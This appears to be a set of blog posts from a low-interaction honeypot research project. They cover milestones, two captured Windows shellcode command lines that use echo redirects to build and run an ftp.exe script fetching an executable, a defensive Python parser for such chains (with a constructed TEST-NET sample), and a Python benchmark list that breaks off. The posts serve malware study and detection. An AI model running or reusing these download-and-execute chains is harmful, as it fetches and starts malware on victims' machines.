Iteolih: Miles and More

We have a new milestone due:

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on Linux and OpenBSD

An exploit taken from a public repository and run against the software is detected and emulated.
In short, all required points are hit with the current svn.

Iteolih: malicious FTP services

Yesterday I got an incomplete but successful attack on my honeypot; the attacker's remote code execution looked like this:

WinExec("cmd /c echo open 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked and saw an offer to download something from somewhere.

cmd /c echo open 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Iteolih: Is this worth your time?
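Both command lines above use the same trick: a handful of echo redirects build an ftp.exe script, ftp -n -s:<file> runs it, and the fetched file is started afterwards. The first one never gets to the ftp call, which is why that attack was incomplete. As an added example (not code from the original post or from the honeypot itself), here is a small Python parser that pulls host, port, credentials, transfer mode and file names out of such one-liners and distinguishes a truncated chain from a full download-and-execute chain. Its inputs are the two commands quoted on this page plus one constructed sample using a TEST-NET address (192.0.2.10) and made-up names. Note that the open lines on this page carry a single token (the host was evidently removed before posting); ftp.exe would take that token as the host name, and the parser reports it the same way.

```python
# Added example, not from the original post or the honeypot's code base:
# extract the download instructions from the cmd.exe/ftp.exe one-liners that
# Windows shellcode hands to WinExec().
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Samples: the two commands quoted on this page, plus one constructed chain
# (TEST-NET address and made-up file names) that is complete end to end.
SAMPLE_WINEXEC = 'WinExec("cmd /c echo open 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")'
SAMPLE_FTP_CHAIN = ("cmd /c echo open 4356 > i&echo user ik ik >> i &echo binary >> i "
                    "&echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe")
SAMPLE_CONSTRUCTED = ("cmd /c echo open 192.0.2.10 2121 > x&echo user a b >> x&echo binary >> x"
                      "&echo get a.exe >> x&echo quit >> x&ftp -n -s:x&a.exe&del x")


@dataclass
class FtpDownload:
    script_file: Optional[str] = None      # file the "echo ... > f" lines build
    host: Optional[str] = None
    port: Optional[int] = None
    user: Optional[str] = None
    password: Optional[str] = None
    binary: bool = False
    files: List[str] = field(default_factory=list)      # arguments of get/mget
    ftp_invoked: bool = False              # "ftp -n -s:<script>" is present
    run_after: List[str] = field(default_factory=list)  # commands after the ftp call
    unknown: List[str] = field(default_factory=list)    # ftp verbs not modelled here

    @property
    def download_and_execute(self) -> bool:
        """True when the script is actually run and a fetched file is then started."""
        return self.ftp_invoked and any(f in self.run_after for f in self.files)


_WINEXEC = re.compile(r'^WinExec\(\s*"(?P<cmd>.*)"\s*(?:,\s*\d+\s*)?\)\s*;?$', re.S)
_CMD_C = re.compile(r'^cmd(?:\.exe)?\s+/c\s+', re.I)
_ECHO = re.compile(r'^echo\s+(?P<body>.*?)\s*>{1,2}\s*(?P<file>\S+)$', re.I)
_FTP = re.compile(r'^ftp(?:\.exe)?\s+(?P<opts>.*)$', re.I)
_SCRIPT_OPT = re.compile(r'-s:(?P<file>\S+)', re.I)


def split_cmd_chain(cmdline: str) -> List[str]:
    """Unwrap WinExec("...") and "cmd /c", then split on cmd.exe's & and && operators."""
    s = cmdline.strip()
    m = _WINEXEC.match(s)
    if m:
        s = m.group("cmd")
    s = _CMD_C.sub("", s)
    return [p.strip() for p in re.split(r"&&?", s) if p.strip()]


def _apply_ftp_verb(d: FtpDownload, line: str) -> None:
    """Interpret one line of the generated ftp.exe script."""
    toks = line.split()
    if not toks:
        return
    verb, args = toks[0].lower(), toks[1:]
    if verb == "open" and args:
        # ftp.exe syntax: open <host> [port]. A single token is the host name.
        d.host = args[0]
        if len(args) > 1 and args[1].isdigit():
            d.port = int(args[1])
    elif verb == "user" and args:
        d.user = args[0]
        d.password = args[1] if len(args) > 1 else None
    elif verb in ("binary", "bin"):
        d.binary = True
    elif verb in ("get", "recv", "mget"):
        d.files.extend(args)
    elif verb in ("quit", "bye", "ascii", "prompt"):
        pass
    else:
        d.unknown.append(line)


def parse_ftp_oneliner(cmdline: str) -> FtpDownload:
    """Parse a cmd.exe chain that builds and runs an ftp.exe script."""
    d = FtpDownload()
    script_lines: List[str] = []
    for part in split_cmd_chain(cmdline):
        m = _ECHO.match(part)
        if m and not d.ftp_invoked:
            if d.script_file is None:
                d.script_file = m.group("file")
            if m.group("file") == d.script_file:      # ignore echoes into other files
                script_lines.append(m.group("body"))
            continue
        m = _FTP.match(part)
        if m:
            s = _SCRIPT_OPT.search(m.group("opts"))
            if s and s.group("file") == d.script_file:
                d.ftp_invoked = True
            continue
        if d.ftp_invoked:
            d.run_after.append(part)
    for line in script_lines:
        _apply_ftp_verb(d, line)
    return d


if __name__ == "__main__":
    for sample in (SAMPLE_WINEXEC, SAMPLE_FTP_CHAIN, SAMPLE_CONSTRUCTED):
        print(parse_ftp_oneliner(sample))
```

The structured result is what a low interaction honeypot wants after emulation: with host, port, credentials and file name in hand it can fetch the sample itself instead of merely logging the shellcode, and the download_and_execute flag separates a truncated chain (the WinExec sample above, which ends before the ftp call) from a complete one.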

Due to the length of the full term "Improving the effectiveness of low interaction honeypots", I decided to use Iteolih as a unique abbreviation. Things are rolling for the project: writing code has started, and a basic homepage with instructions on how to compile and use it has been created.
I even had the plan to write about it once or twice: finish something in the code, then write about it. When I was done with the code, I got the idea that writing about it was not worth your time.

Iteolih: Python Benchmark

As the plan is to embed Python as the scripting language of the honeypot, I ran a benchmark on a test suite. The 'test suite' is a C core which accepts connections and lets Python deal with the input. The protocol used for benchmarking is HTTP; the service serves a non-static HTML page.
I tested

  • 2.6.2 (release26-maint, Apr 19 2009, 02:15:38)
  • 3.0.1+ (r301:69556, Apr 15 2009, 17:22:45)
  • 3.1a1+ (py3k, Mar 30 2009, 02:02:26)

